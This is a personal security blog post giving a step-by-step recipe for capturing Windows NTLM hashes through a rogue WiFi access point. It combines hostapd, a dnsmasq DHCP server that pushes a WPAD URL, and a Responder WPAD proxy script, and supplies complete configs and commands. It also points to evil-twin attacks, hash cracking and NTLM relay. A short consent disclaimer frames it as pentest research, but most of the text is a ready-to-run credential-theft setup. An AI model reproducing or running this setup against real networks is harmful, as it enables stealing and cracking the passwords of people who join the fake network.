Capturing NTLM hashes left and right using fake WiFi access points

As this is my first blog post, I sincerely hope that you'll forgive and bear with me as I write this. 

Some time ago as I was learning WiFi based attacks, I came across creating fake access points to lure users into connecting to it. At the same time a new feature in Responder was added which allowed us to create fake DHCP servers to serve a fake WPAD server, host a fake WPAD config file and later capture hashes. More can be found here: https://g-laurent.blogspot.com/2021/08/responders-dhcp-poisoner.html.This was when I started to wonder if I could use these two together to create a fake access point which allowed me to capture hashes from any Windows machine which connected to the access point.

This blog post is about how I found a novel technique to capture NTLM hashes from windows machines capable of using WiFi. I thoroughly suggest you learn what WPAD is and how hijacking it works currently in internal network pentest. Also I donot endorse that any of you perform this without consent from the victim during or outside of a pentest.

Now let's get straight into it.

So this is how the whole attack will unfold. First as attackers we create a fake access point. For the sake of this blog; let's just call it `Test`. As soon as we create an access point called Test, it will start appearing in the WiFi list of other machines and they can join it if they want. We'll also add a DHCP server backing our fake access point. So anyone who connects to this fake WiFi access point `Test` can successfully connect and also get a valid IP address. The victim gaining a valid IP address from our fake access point is very important here as without a valid IP address and gateway it can't access the fake WPAD file hosted in our gateway (we'll discuss this later). After the victim is connected to our fake access point, using the magic of WPAD (please learn about this before reading further into the blog) WIndows will authenticate to our attacker machine and we gain the victim's NTLM hash. That's it. Very very simple.

The attack seldom requires any intervention from the victim. As long as the victim has a WiFi capable computer we can very easily gain their NTLM hash. 

Now for the more technical and attacking side of things. 

This attack involves an attacker machine with hostapd, dnsmasq and Responder installed, 1 monitor mode capable wireless card (2 if you also want to conduct an evil-twin attack) and finally a victim machine with  Windows installed and WiFi connection available.

NOTE: Make sure your attacker WiFi card is monitor mode capable. Both for Hostapd and the evil-twin attack.

Here's how the whole technique will follow:

1. First we will host a fake access point using `hostapd`.

2. At the same time we'll also host a fake DHCP server using `dnsmasq` which will send the fake WPAD server details to the victim.

3. After this we force set our attacker IP address, subnet mask and that new IP address as the network gateway of that subnet.

3. After this we'll launch `Responder` with the proper options to send a fake WPAD config and host a fake WPAD server which will send WPAD proxy details to our own attacker machine and subsequently proxy and capture NTLM hashes later.

4. Finally we'll conduct a evil-twin attack of sorts to connect the victim to our network. Or in our case we'll just connect to the attacker WiFi access point manually from the victim laptop just for a showcase. In a real attack scenario a hotspot attack or an evil-twin attack will work fine.

5. Our fake DHCP server will send the fake WPAD server details in it's config while the victim asks for DHCP configuration, in turn the victim asks for WPAD config from our attacker machine running Responder which serves the config file containing our server's details.

6. Finally after the connection to our Access Point is completed and its WPAD server set to our attacker machine, Windows will try it's regular initial connections (weather details, microsoft connections, etc); however all these connections go through the WPAD proxy (our Responder listener running in the attacker machine) which will reply with `Authentication required`. The victim will then try to authenticate with their NTLM hash which will be captured through Responder.

7. After capturing the hash we are free to close our fake Access Point and the victim will then go back to connecting to the original Access Point Or we can apply a captive portal attack for further attacks.

NOTE: Always set the routing table and attacker IP AFTER starting hostapd, as hostapd will unset any IP address set in the routing table.

The full steps with their commands are listed below:

1. Hosting a fake access point.

We'll be creating a fake AP using hostapd. The config file for hostapd goes as follows:

 
interface=wlan1
channel=6
ssid=Test
hw_mode=g
ignore_broadcast_ssid=0
macaddr_acl=0
 

2. Setup a proper DHCP server using dnsmasq

Next, we'll be hosting a DHCP server using dnsmasq. The config file for dnsmasq goes as follows inside /etc/dnsmasq.conf:

interface=wlan1
dhcp-range=192.169.1.2, 192.169.1.30, 255.255.255.0, 12h
#dhcp-option=3, 192.169.1.1
#dhcp-option=6, 192.169.1.1
server=8.8.8.8
log-queries
log-dhcp
listen-address=127.0.0.1
#address=/#/192.169.1.1
dhcp-option=252,http://192.169.1.1/wpad.dat


We'll now enable dnsmasq using sudo systemctl enable dnsmasq and start it using sudo systemctl start dnsmasq







3. Now we'll start the fake access point using  sudo hostapd config.conf. This will start hostapd which will host a fake Access Point for us.

4. Now for the victim to correct get a proper IP address and for our fake access point to act as a "network", we have to set a gateway for the network. So first we set our attacker machine's IP address and set that IP as the gateway IP. To do that, first set our attacker's IP to the first IP in the range we set in our DHCP config, i.e 192.169.1.1

We'll do

ifconfig wlan1 up 192.169.1.1 netmask 255.255.255.0
to set our wlan1's ip address.

Next we do,

route add -net 192.169.1.0 netmask 255.255.255.0 gw 192.169.1.1

to set the gateway of the network.

5. Now for the final part; we setup Responder to capture hashes as soon as the victim connects to our network.

Goto Responder.conf and update the wpad part with:

WPADScript = function FindProxyForURL(url, host){if ((host == "localhost") || shExpMatch(host, "localhost.*") ||(host == "127.0.0.1") || isPlainHostName(host)) return "DIRECT"; if (dnsDomainIs(host, "ProxySrv")||shExpMatch(host, "(*.ProxySrv|ProxySrv)")) return "DIRECT"; return 'PROXY ProxySrv:3128; PROXY ProxySrv:3141; DIRECT';}  

Set the ProxySrv to your attacker server i.e in our case 192.169.1.1

Finally, run Responder with:

./Responder.py -I wlan1 -Pdv







6. Finally we can run an evil twin attack or similar to make the victim connect to our access point. Here I've connected to the access point manually but you're more than free to conduct a wireless attack to make a victim connect forcefully (i.e through evil-twin or others)

See here how the victim is connected to our fake access point `Test` but cannot access the internet. Note here that we can in-fact also provide the victim with internet connectivity through IP forwarding; however we did not do that here.

And see here while being connected to our fake access point `Test`, the IP address of the victim is exactly somewhere in `192.169.1.x` like we set it in the DHCP config file.

And boom! now we finally have the hash of the victim as it is connected to our fake access point with a fake WPAD config injected while it tried to access anything on the internet.

A full picture of the attack looks like:

At the left you can see me starting hostapd, at the top right you can see me setting the routing table and gateway for the new network created. At the bottom right you can see Responder capturing hashes. We can then crack the hashes and get the plaintext password. Even better, if any of you guys can find a way to relay this hash within a domain context.

dnsmasq was already running so I didn't have to enable it again. Enabling and starting dnsmasq is a one time deal so once it starts running we don't have to change anything again.

Hopefully this has been a fun experience for you guys as it was definitely for me while I was conducting this research. As far as I know a technique of this sorts doesn't exist in the wild. You could also probably conduct a NTLM relay technique with this attack but I haven't tried it. You can definitley try it and let me know if it works. That'd be even more awesome :D 

Thank you very much for bearing with me. 

Feel free to follow me on twitter if you liked the post: https://twitter.com/emalp_